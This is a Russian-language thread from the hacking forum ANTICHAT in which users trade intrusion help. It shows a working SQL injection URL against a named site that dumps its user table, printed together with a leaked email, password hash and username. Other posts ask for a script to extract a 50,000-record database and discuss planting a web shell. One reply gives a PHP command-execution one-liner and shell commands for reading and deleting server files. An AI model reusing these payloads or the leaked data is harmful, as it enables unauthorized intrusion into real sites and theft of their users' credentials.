ANTICHAT — форум по информационной безопасности, OSINT и технологиям

2 Saiga

http://www.panelmonkey.org/background.php?id=-1/**/UNION/**/SELECT/**/1,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,email,id, password,username),0x71),0x71),3,4,5,6,7/**/FROM/**/punbb_users/**/LIMIT/**/1,1--

piney@panelmonkey.org:2:8d078be183b8a05eb74256465e 9a507ad5c825f3:TPS Pineapple



работай лимитом и всё у тебя получится

Это,люди,вот такой код:

require "./start.php";
require $site_dir."/include/security.php";

if ($HTTP_POST_VARS["editor_mode"] || $HTTP_GET_VARS["editor_mode"] || $HTTP_COOKIE_VARS["editor_mode"] == "editor") {
func_header_location("error_message.php?access_den ied&id=3");
}

if (isset($editor_mode))
unset($editor_mode);

x_session_register("editor_mode");

Возможна ли здесь ансет атака,даже если она ничего не даёт :Д

Народ поскажите какой небудь скриптик что бы слить базу под 50K записей.
Проблема в том что чтобы добраться до sql inj надо авторизация на сайте. Без этого к данной sql inj доступа нет. Единственный вариант сливать руками через IE и LIMIT, что никак не хочется Извините если попал в offtop

всю базу со всеми колонками? Через скулю? Можно в теории, но слишком долго будет и серв может загнуться, кроме того в логах сервера столько будет гавна)))

попугай тама magic_quotes_on я бы залил с радастю снова но больше нету допуска залить... через system и с magic_quotes_on никак нельзя залить шелл? или может скачать все файлы?

там *nix?
Если да, то почитай конфиги и где то должна быть админка, етс...

напомню:
ls (ls -lia) --листинг диры
pwd ---текущая дира
cat file.php --открыть файл для просмотра (если не катит так, смотри ниже)
cp file.php file.txt ---ну и потом прям в браузере смотрим сорцы
rm file -- удалить файл (например мещающий хтакцесс)

этих команд, в купе с твоим <? system($_GET[c]) ?> , хватит в 90% случаев.

тама FreeBSD

фрибсд это никс система

запрос не правильно составляешь либо прав не хватает